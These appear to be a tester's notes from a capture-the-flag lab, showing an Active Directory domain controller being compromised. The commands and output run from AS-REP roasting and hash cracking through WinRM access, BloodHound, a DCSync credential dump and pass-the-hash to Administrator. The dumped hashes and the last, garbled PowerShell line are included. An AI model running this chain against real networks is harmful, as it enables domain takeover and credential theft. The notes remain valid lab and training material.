Rustscan
Open 172.16.2.5:53
Open 172.16.2.5:88
Open 172.16.2.5:135
Open 172.16.2.5:139
Open 172.16.2.5:445
Open 172.16.2.5:389
Open 172.16.2.5:464
Open 172.16.2.5:636
Open 172.16.2.5:593
Open 172.16.2.5:49687
Open 172.16.2.5:49675
Open 172.16.2.5:49671
Open 172.16.2.5:49676
Open 172.16.2.5:49665
Open 172.16.2.5:49674
Open 172.16.2.5:49668
Open 172.16.2.5:49666
Open 172.16.2.5:49695Port 389
rpcclient -U "" -N 172.16.2.5
No results
rpcclient $> enumdomains
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydomain
command not found: querydomain
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> getdomgroupsIts a domin controller so we can try to enumerate users with impacket script
getNPusers
impacket-GetNPUsers -usersfile users.txt -no-pass -request -dc-ip 172.16.2.5 dante.admin/172.16.2.5 -format hashcat
$krb5asrep$23$jbercov@DANTE.ADMIN:6d699d224a86cb89276cf70caf8de3b4$414bbe0598a5bcb246aed4121a5521d73d45d18fd7c180d05677fa0aa9eaac8342f5da491d95e38bbd89c61a057104ac8da7dfb3fa61f7df4452e7e85b0463ce39c090c4ddc8d7a72295e9b43a76930fc70fb5b91388c319f3f1b227c7098c09f9f89da2fc5e0d61d73305797a1b8d97285a6817ae4439b708bee2715fa6ed4e3132c32e81bb3ed458425487af549677f97a1f7c50cf53f409e15d23ffd6bc7fd16b32ff7916816f7cb4b8fdf2a9e5727d8178a99bfdaa48943e2803a0a1a68b5a02157400eb9525f54e03f0a55d65a6a71c71ec1d38645f1bd78088f6e43f40da8871a6f7acd5d7bad2Cracking the hash
hashcat hash.txt /usr/share/wordlists/rockyou.txt$krb5asrep$23$jbercov@DANTE.ADMIN:6d699d224a86cb89276cf70caf8de3b4$414bbe0598a5bcb246aed4121a5521d73d45d18fd7c180d05677fa0aa9eaac8342f5da491d95e38bbd89c61a057104ac8da7dfb3fa61f7df4452e7e85b0463ce39c090c4ddc8d7a72295e9b43a76930fc70fb5b91388c319f3f1b227c7098c09f9f89da2fc5e0d61d73305797a1b8d97285a6817ae4439b708bee2715fa6ed4e3132c32e81bb3ed458425487af549677f97a1f7c50cf53f409e15d23ffd6bc7fd16b32ff7916816f7cb4b8fdf2a9e5727d8178a99bfdaa48943e2803a0a1a68b5a02157400eb9525f54e03f0a55d65a6a71c71ec1d38645f1bd78088f6e43f40da8871a6f7acd5d7bad2:myspace7Crackmap exec with the id and passs
✗ crackmapexec smb 172.16.2.5 -u 'jbercov' -p 'myspace7' --shares
SMB 172.16.2.5 445 DANTE-DC02 [*] Windows 10.0 Build 17763 x64 (name:DANTE-DC02) (domain:DANTE.ADMIN) (signing:True) (SMBv1:False)
SMB 172.16.2.5 445 DANTE-DC02 [+] DANTE.ADMIN\jbercov:myspace7
SMB 172.16.2.5 445 DANTE-DC02 [+] Enumerated shares
SMB 172.16.2.5 445 DANTE-DC02 Share Permissions Remark
SMB 172.16.2.5 445 DANTE-DC02 ----- ----------- ------
SMB 172.16.2.5 445 DANTE-DC02 ADMIN$ Remote Admin
SMB 172.16.2.5 445 DANTE-DC02 C$ Default share
SMB 172.16.2.5 445 DANTE-DC02 IPC$ READ Remote IPC
SMB 172.16.2.5 445 DANTE-DC02 NETLOGON READ Logon server share
SMB 172.16.2.5 445 DANTE-DC02 SYSVOL READ Logon server share
jay ~/Documents/dante/DC02 took 2s
➜ crackmapexec winrm 172.16.2.5 -u 'jbercov' -p 'myspace7'
SMB 172.16.2.5 5985 DANTE-DC02 [*] Windows 10.0 Build 17763 (name:DANTE-DC02) (domain:DANTE.ADMIN)
HTTP 172.16.2.5 5985 DANTE-DC02 [*] http://172.16.2.5:5985/wsman
WINRM 172.16.2.5 5985 DANTE-DC02 [+] DANTE.ADMIN\jbercov:myspace7 (Pwn3d!)Evil-winrm
evil-winrm -i 172.16.2.5 -u 'jbercov' -p 'myspace7' /domain:dante.admingetting the flag
Location : Directory: C:\Users\jbercov\Desktop
DANTE{Im_too_hot_Im_K3rb3r045TinG!}
Bloodhound python
The user jbercov is domain user so lets do bloodhound
bloodhound-python -u 'jbercov' -p 'myspace7' -dc 'DANTE-DC02.dante.admin' -d dante.admin -c all -ns 172.16.2.5
Results
The user JBERCOV@DANTE.ADMIN has the DS-Replication-Get-Changes and the DS-Replication-Get-Changes-All privilege on the domain DANTE.ADMIN.
These two privileges allow a principal to perform a DCSync attack.
Impacket DCsync
➜ impacket-secretsdump 'DANTE.admin/jbercov:myspace7@172.16.2.5'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4c827b7074e99eefd49d05872185f7f8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2e5f00bc433acee0ae72f622450bd63c:::
DANTE.ADMIN\jbercov:1106:aad3b435b51404eeaad3b435b51404ee:2747def689b576780fe2339fd596688c:::
DANTE-DC02$:1000:aad3b435b51404eeaad3b435b51404ee:2d71f79cc91e685e607cca600594c414:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0652a9eb0b8463a8ca287fc5d099076fbbd5f1d4bc0b94466ccbcc5c4a186095
Administrator:aes128-cts-hmac-sha1-96:08f140624c46af979044dde5fff44cfd
Administrator:des-cbc-md5:8ac752cea84f4a10
krbtgt:aes256-cts-hmac-sha1-96:a696318416d7e5d58b1b5763f1a9b7f2aa23ca743ac3b16990e5069426d4bc46
krbtgt:aes128-cts-hmac-sha1-96:783ecc93806090e2b21d88160905dc36
krbtgt:des-cbc-md5:dcbff8a80b5b343e
DANTE.ADMIN\jbercov:aes256-cts-hmac-sha1-96:5b4b2e67112ac898f13fc8b686c07a43655c5b88c9ba7e5b48b1383bc5b3a3b6
DANTE.ADMIN\jbercov:aes128-cts-hmac-sha1-96:489ca03ed99b1cb73e7a28c242328d0d
DANTE.ADMIN\jbercov:des-cbc-md5:c7e08938cb7f929d
DANTE-DC02$:aes256-cts-hmac-sha1-96:bdaa01ff2945c6f49f5fe57c949c69fd1feb6790f7bc8a1124dc698e430d7981
DANTE-DC02$:aes128-cts-hmac-sha1-96:fa87584c0de69755a65fbf6008da8298
DANTE-DC02$:des-cbc-md5:83a82f8013c21392
[*] Cleaning up...Evilwinrm
evil-winrm -i 172.16.2.5 -u 'Administrator' -H 4c827b7074e99eefd49d05872185f7f8 /domain:dante.admin*Evil-WinRM* PS C:\Users\Administrator\Documents> type Jenkins.bat
net user Admin_129834765 SamsungOctober102030 /add*Evil-WinRM* PS C:\Users\Administrator\Desktop> type Note.txt
You were supposed to find this subnet via enumerating the browser history files on DC01.
172.16.1.10 can also pivot to this box, it may be a bit more stable than DC01.
Flag
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat flag.txt
DANTE{DC_or_Marvel?}Ping Sweep Windows
�1�.�.�2�56� �|� �%� �{�"�1�7�2�.�1�6�.�2�.�$�(�$�_�)�:� �$�(�T�e�s�t�-�C�o�n�n�e�c�t�i�o�n� �-�c�o�u�n�t� �1� �-�c�o�m�p� �1�7�2�.�1�6�.�2�.�$�(�$�_�)� �-�q�u�i�e�t�)�"�}���